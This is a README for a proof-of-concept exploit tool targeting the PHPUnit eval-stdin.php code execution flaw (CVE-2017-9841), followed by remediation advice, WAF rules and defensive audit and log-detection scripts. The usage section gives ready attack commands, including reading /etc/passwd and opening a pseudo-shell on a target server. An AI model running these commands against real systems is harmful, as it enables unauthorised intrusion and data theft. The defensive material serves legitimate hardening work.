## https://sploitus.com/exploit?id=3A214513-27F6-566A-A861-1A2241A825C8
# CVE-2017-9841 - PHPUnit Remote Code Execution (RCE) PoC

> **⚠️ DISCLAIMER:** This tool is intended **solely for educational purposes and authorized security testing**. Unauthorized use against systems you do not own or have explicit permission to test is **illegal**. The author assumes no liability for any misuse of this tool.

---

## Overview

**CVE-2017-9841** is a Remote Code Execution (RCE) vulnerability in the **PHPUnit** library affecting versions prior to **5.6.3** and **6.x prior to 6.4.2**.

The vulnerability exists in `src/Util/PHP/eval-stdin.php`, which executes PHP code received via `php://input` (POST body) using the `eval()` function. If this file is publicly accessible (e.g., within an unprotected `vendor/` directory), an attacker can execute arbitrary PHP code on the server without authentication.

### Vulnerability Details

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2017-9841 |
| **CVSS Score** | 9.8 (Critical) |
| **Affected** | PHPUnit < 5.6.3 and 6.x < 6.4.2 |

The vulnerable file consists of a single `eval()` call:

```php
<?php
eval('?>' . file_get_contents('php://input'));
```

This file accepts **PHP code from the POST body** and immediately executes it via `eval()` without any authentication or validation.

---

## Installation

### Requirements

- Python 3.6+
- `requests` library

```bash
pip install requests
```

### Setup

```bash
git clone 
cd CVE-2017-9841
chmod +x poc_cve-2017-9841.py
```

---

## Usage

### Basic Syntax

```bash
python3 poc_cve-2017-9841.py -u URL [options]
```

The `-u` flag accepts either a **base URL** (the vulnerable path is appended automatically) or a **full URL** pointing directly to `eval-stdin.php`.

### 1. Vulnerability Check (No Command Execution)

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --check
```

**Output:**
```
[*] Target : https://target.com
[*] Endpoint: https://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

[*] Checking vulnerability on: ...
[+] File accessible (HTTP 200)
[+] VULNERABLE! Code execution confirmed.
[+] Response: VULN_CHECK_OK_2017_9841
```

### 2. Command Execution

```bash
# Single command
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'whoami'

# Multiple commands
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'id && hostname && uname -a'

# Read a file
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'cat /etc/passwd'

# Save output to file
python3 poc_cve-2017-9841.py -u 'https://target.com' -c 'cat /etc/passwd' -o result.txt
```

### 3. Server Information (Read-Only)

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --info
```

**Output:**
```
=== SERVER INFORMATION ===
PHP Version : 8.x.x
OS          : Linux
SAPI        : fpm-fcgi
User        : www-data
Hostname    : web-server-01
Server IP   : 192.168.1.100
CWD         : /var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP
Doc Root    : /var/www/html/
Server SW   : Apache
Memory Limit: 256M
Max Exec    : 30s
Open Basedir: (none)
Disabled Fn : (none)

=== DANGEROUS FUNCTIONS ===
  system: YES
  exec: YES
  passthru: YES
  shell_exec: YES
  proc_open: YES
  popen: YES
  curl_exec: YES
```

### 4. Interactive Pseudo-Shell

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --shell
```

**Output:**
```
[*] Pseudo-shell (type 'exit' or 'quit' to leave)
--------------------------------------------------
www-data@web-server-01$ whoami
www-data
www-data@web-server-01$ ls -la /var/www/html/
total 12
drwxr-xr-x 4 www-data www-data 4096 Jun 11 00:00 .
drwxr-xr-x 3 root     root     4096 Jan 01 00:00 ..
drwxr-xr-x 8 www-data www-data 4096 Jun 11 00:00 app
www-data@web-server-01$ exit
[*] Exiting shell.
```

### 5. Auto-Find Vulnerable Path

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' --find-path
```

### 6. Custom Path

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' \
  --path '/custom/path/eval-stdin.php' -c 'whoami'
```

### 7. Full URL to eval-stdin.php

```bash
python3 poc_cve-2017-9841.py \
  -u 'https://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' \
  -c 'whoami'
```

### 8. Execute Raw PHP Code

```bash
python3 poc_cve-2017-9841.py -u 'https://target.com' \
  --php ''
```

---

## Options Reference

| Flag | Description |
|------|-------------|
| `-u, --url URL` | Target base URL or full URL to `eval-stdin.php` |
| `-c, --cmd CMD` | CLI command to execute on the target server |
| `--check` | Check if the target is vulnerable without executing commands |
| `--shell` | Open a pseudo-interactive shell |
| `--info` | Gather server information (read-only) |
| `--find-path` | Scan common paths to locate `eval-stdin.php` |
| `--path PATH` | Specify a custom path to `eval-stdin.php` |
| `--timeout N` | Request timeout in seconds (default: 30) |
| `-o, --output FILE` | Save command output to a file |
| `--php CODE` | Execute raw PHP code instead of system commands |

---

## Remediation

### Immediate Actions (Do This NOW)

#### 1. Delete the Vulnerable File

```bash
sudo rm /path/to/project/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```

#### 2. Block Access to the Vendor Directory

Add an `.htaccess` file inside the `vendor/` directory:

```apache
# /path/to/project/vendor/.htaccess
Deny from all
```

Or configure it in your Apache VirtualHost:

```apache
<Directory /path/to/project/vendor>
    Require all denied
</Directory>
```

For Nginx:

```nginx
location /vendor/ {
    deny all;
    return 403;
}
```

#### 3. Remove Dev Dependencies from Production

```bash
cd /path/to/project
composer install --no-dev --optimize-autoloader
```
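The three immediate actions above can be checked and applied mechanically across a whole document root. The script below is an added example, not code from this PoC repository or from PHPUnit: it walks a directory tree, lists every `eval-stdin.php` it finds, flags each `vendor/` directory that lacks an `.htaccess` with a deny rule (step 2), and deletes the vulnerable files (step 1). The directory layout it builds under a temporary directory is constructed for the demonstration.

```python
"""Audit a deployed PHP tree for CVE-2017-9841 exposure.

Added example (not part of the PoC repository or of PHPUnit): finds every
eval-stdin.php under a document root, reports vendor/ directories that lack
a denying .htaccess, and can delete the vulnerable files. The sample tree
built by build_sample_tree() is constructed for this demonstration.
"""
import os
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List

VULN_FILE = "eval-stdin.php"
DENY_DIRECTIVES = ("deny from all", "require all denied")  # Apache 2.2 / 2.4 forms


@dataclass
class AuditResult:
    eval_stdin_files: List[str] = field(default_factory=list)
    unprotected_vendor_dirs: List[str] = field(default_factory=list)


def vendor_is_denied(vendor_dir: str) -> bool:
    """True when vendor_dir/.htaccess carries an Apache deny rule."""
    htaccess = os.path.join(vendor_dir, ".htaccess")
    if not os.path.isfile(htaccess):
        return False
    with open(htaccess, encoding="utf-8", errors="replace") as fh:
        text = fh.read().lower()
    return any(directive in text for directive in DENY_DIRECTIVES)


def audit_tree(docroot: str) -> AuditResult:
    """Walk docroot once, collecting vulnerable files and exposed vendor/ dirs."""
    result = AuditResult()
    for dirpath, _dirnames, filenames in os.walk(docroot):
        if VULN_FILE in filenames:
            result.eval_stdin_files.append(os.path.join(dirpath, VULN_FILE))
        if os.path.basename(dirpath) == "vendor" and not vendor_is_denied(dirpath):
            result.unprotected_vendor_dirs.append(dirpath)
    return result


def remove_eval_stdin(docroot: str) -> List[str]:
    """Remediation step 1 applied to every copy found; returns the deleted paths."""
    deleted = []
    for path in audit_tree(docroot).eval_stdin_files:
        os.remove(path)
        deleted.append(path)
    return deleted


def build_sample_tree(root: str) -> None:
    """Constructed layout: app1 ships dev dependencies with an exposed vendor/;
    app2 has no PHPUnit and its vendor/ is denied."""
    vuln_dir = os.path.join(root, "app1", "vendor", "phpunit", "phpunit",
                            "src", "Util", "PHP")
    os.makedirs(vuln_dir)
    with open(os.path.join(vuln_dir, VULN_FILE), "w", encoding="utf-8") as fh:
        fh.write("<?php // placeholder standing in for the real file\n")
    safe_vendor = os.path.join(root, "app2", "vendor")
    os.makedirs(safe_vendor)
    with open(os.path.join(safe_vendor, ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write("Require all denied\n")


def run_demo() -> Dict[str, int]:
    """Audit the constructed tree, apply step 1, audit again; returns counts."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        before = audit_tree(root)
        deleted = remove_eval_stdin(root)
        after = audit_tree(root)
        return {
            "vuln_files_before": len(before.eval_stdin_files),
            "exposed_vendor_before": len(before.unprotected_vendor_dirs),
            "deleted": len(deleted),
            "vuln_files_after": len(after.eval_stdin_files),
            # deleting the file does not protect vendor/; step 2 is still needed
            "exposed_vendor_after": len(after.unprotected_vendor_dirs),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Run against a real document root with `audit_tree("/var/www/html")` first and only call `remove_eval_stdin()` once the list looks right; the second audit in `run_demo()` shows why step 2 is still required after step 1, since removing the file leaves `vendor/` itself browsable.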

### Short-Term Hardening

#### 4. Enable `disable_functions` in php.ini

```ini
; /etc/php/8.4/fpm/php.ini
disable_functions = system,exec,passthru,shell_exec,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
```

#### 5. Enable `open_basedir`

```ini
; /etc/php/8.4/fpm/php.ini or in VirtualHost
open_basedir = /var/www/html/project:/tmp
```

#### 6. Reduce `max_execution_time`

```ini
max_execution_time = 30
```

#### 7. Restart PHP-FPM

```bash
sudo systemctl restart php8.4-fpm
# or
sudo systemctl restart php-fpm
```

### Long-Term Hardening

#### 8. Upgrade PHPUnit

```bash
composer require --dev phpunit/phpunit:^10.0
composer update phpunit/phpunit
```

#### 9. Implement WAF Rules

ModSecurity example:

```
SecRule REQUEST_URI "eval-stdin\.php" \
    "id:1000001,phase:1,deny,status:403,msg:'CVE-2017-9841 Block'"

SecRule REQUEST_URI "/vendor/" \
    "id:1000002,phase:1,deny,status:403,msg:'Block vendor directory access'"
```
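The two ModSecurity rules block requests at the edge; the same two patterns are worth alerting on from access logs so that probing is still visible where no WAF is deployed. The script below is an added example, not part of this PoC: it parses Apache combined-format lines, flags any request for `eval-stdin.php` (raised to critical when a POST was answered with 200, the request shape that reaches `eval()`), rates other requests into `/vendor/` as medium or low depending on whether the server already answered 403, and counts hits per source address. The log lines are constructed and use documentation address ranges.

```python
"""Log-side detection of CVE-2017-9841 probing.

Added example (not part of the PoC): the same two patterns the ModSecurity
rules block, applied to Apache combined-format access log lines.
SAMPLE_LOG is constructed; addresses are from documentation ranges.
"""
import re
from collections import Counter
from typing import Dict, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
EVAL_STDIN_RE = re.compile(r"eval-stdin\.php", re.IGNORECASE)  # mirrors rule id 1000001
VENDOR_RE = re.compile(r"/vendor/")                              # mirrors rule id 1000002

SAMPLE_LOG = """\
203.0.113.7 - - [11/Jun/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Jun/2025:10:00:02 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.7 - - [11/Jun/2025:10:00:03 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 23 "-" "python-requests/2.31"
198.51.100.9 - - [11/Jun/2025:10:00:04 +0000] "GET /vendor/autoload.php HTTP/1.1" 403 199 "-" "curl/8.0"
this line is not in combined log format
192.0.2.5 - - [11/Jun/2025:10:00:05 +0000] "POST /api/login HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Severity for one request, or None when nothing matches.

    eval-stdin.php anywhere in the path is 'high'; a POST answered with 200 is
    'critical' because that is the request shape that reaches eval().
    Anything else under /vendor/ is 'medium', or 'low' when the server already
    answered 403 (the deny rule is in place)."""
    path, method, status = entry["path"], entry["method"], entry["status"]
    if EVAL_STDIN_RE.search(path):
        return "critical" if (method == "POST" and status == "200") else "high"
    if VENDOR_RE.search(path):
        return "low" if status == "403" else "medium"
    return None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run every line through the parser and classifier; unparseable lines are skipped."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry)
        if severity:
            findings.append({**entry, "severity": severity})
    return findings


def hits_per_source(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per client address, the pivot an analyst triages first."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    results = detect(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"[{f['severity']:8}] {f['ip']} {f['method']} {f['path']} -> {f['status']}")
    print(hits_per_source(results))
```

A 403 on the `/vendor/` request is the signal that step 2 of the remediation is working; a 200 on a POST to `eval-stdin.php` should be treated as a confirmed compromise rather than a probe.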

#### 10. CI/CD Pipeline Hardening

```yaml
# Example: GitHub Actions
- name: Install production dependencies only
  run: composer install --no-dev --optimize-autoloader

- name: Remove test files and vulnerable scripts
  run: |
    rm -rf vendor/phpunit
    rm -rf vendor/mockery
    rm -rf tests/
    find vendor -name "eval-stdin.php" -delete
```

---

## Attack Flow Diagram

```
                    ┌──────────────────────────────┐
                    │          Attacker            │
                    └──────────────┬───────────────┘
                                   │ POST (PHP code)
                                   ▼
┌─────────────────────────────────────────────────────────────┐
│                        Apache Server                        │
│  ┌───────────────────────────────────────────────────────┐  │
│  │  /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php  │  │
│  │                                                       │  │
│  │  eval('?>' . file_get_contents('php://input'));       │  │
│  │           ▲                                           │  │
│  └───────────┼───────────────────────────────────────────┘  │
│              │                                              │
│              ▼                                              │
│  ┌───────────────────────────────────────────────────────┐  │
│  │            Arbitrary Code Execution                   │  │
│  │                                                       │  │
│  │  - Read/Write files on the server                     │  │
│  │  - Access database credentials                        │  │
│  │  - Lateral movement to internal network               │  │
│  │  - Install backdoors / webshells                      │  │
│  │  - Privilege escalation                               │  │
│  └───────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────┘
```

---

## Aggravating Factors

The following conditions significantly increase the severity and exploitability of this vulnerability:

| Factor | Impact |
|--------|--------|
| `disable_functions` is empty | All PHP functions are available (`system`, `exec`, etc.) |
| `open_basedir` is not set | Attacker can read/write files across the entire filesystem |
| High `max_execution_time` | Attacker has more time per request for complex payloads |
| FFI extension loaded | Allows direct C function calls, bypassing PHP restrictions |
| Database extensions loaded | Direct database connections possible (mysqli, pgsql, etc.) |
| No WAF deployed | No request filtering or blocking |
| No IDS/IPS in place | No anomaly detection or alerting |
| Dev dependencies in production | Expands the attack surface unnecessarily |
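Steps 4 to 6 of the remediation and the first four rows of this table describe the same php.ini settings from opposite sides. The script below is an added example, not part of this PoC: a small php.ini reader that audits `disable_functions`, `open_basedir`, `max_execution_time` and `ffi.enable` against the hardened values given above, run over two constructed ini fragments, one weak and one hardened. It assumes a Linux php.ini (`;` comments, colon-separated `open_basedir`).

```python
"""php.ini audit for the CVE-2017-9841 aggravating factors.

Added example (not part of the PoC): reads a php.ini and reports the settings
that remediation steps 4 to 6 tighten. Assumes a Linux php.ini (';' comments,
':'-separated open_basedir). Both ini fragments are constructed.
"""
from typing import Dict, List

# The list from remediation step 4.
REQUIRED_DISABLED = {
    "system", "exec", "passthru", "shell_exec", "proc_open", "popen",
    "curl_exec", "curl_multi_exec", "parse_ini_file", "show_source",
}
MAX_EXECUTION_TIME = 30  # remediation step 6

WEAK_INI = """\
; constructed: values that leave every aggravating factor in place
disable_functions =
;open_basedir =
max_execution_time = 0
ffi.enable = true
"""

HARDENED_INI = """\
; constructed: the values from the remediation section
disable_functions = system,exec,passthru,shell_exec,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
open_basedir = /var/www/html/project:/tmp
max_execution_time = 30
"""


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal key=value reader: drops ';' comments and [sections], strips quotes."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text: str) -> List[str]:
    """Return one finding per weak setting; an empty list means all checks pass."""
    s = parse_php_ini(text)
    findings: List[str] = []

    disabled = {f.strip() for f in s.get("disable_functions", "").split(",") if f.strip()}
    still_enabled = sorted(REQUIRED_DISABLED - disabled)
    if still_enabled:
        findings.append("disable_functions leaves enabled: " + ", ".join(still_enabled))

    if not s.get("open_basedir"):
        findings.append("open_basedir is not set; PHP can read the whole filesystem")

    raw_max = s.get("max_execution_time", str(MAX_EXECUTION_TIME))  # PHP default is 30
    try:
        max_exec = int(raw_max)
    except ValueError:
        max_exec = -1
    if max_exec <= 0 or max_exec > MAX_EXECUTION_TIME:
        findings.append(
            f"max_execution_time = {raw_max} (0 means unlimited; expected 1..{MAX_EXECUTION_TIME})"
        )

    # ffi.enable defaults to 'preload'; 'true' exposes FFI to any script, eval()'d code included
    if s.get("ffi.enable", "preload").lower() in ("true", "1", "on"):
        findings.append("ffi.enable = true allows direct C calls from PHP")

    return findings


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"== {name} ==")
        for finding in audit_php_ini(ini) or ["no findings"]:
            print(" -", finding)
```

Point it at `/etc/php/8.4/fpm/php.ini` (or whichever file `php-fpm -i` reports as loaded) with `audit_php_ini(open(path).read())`; note that a pool-level `php_admin_value` or a per-VirtualHost override can tighten these settings without the findings in the main file changing.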

---

## References

- [NVD - CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841)
- [PHPUnit GitHub Issue #2728](https://github.com/sebastianbergmann/phpunit/issues/2728)
- [Exploit-DB #43340](https://www.exploit-db.com/exploits/43340)
- [MITRE CVE](https://vulners.com/cve/CVE-2017-9841)

---

## License

This tool is provided for educational and authorized security testing purposes only.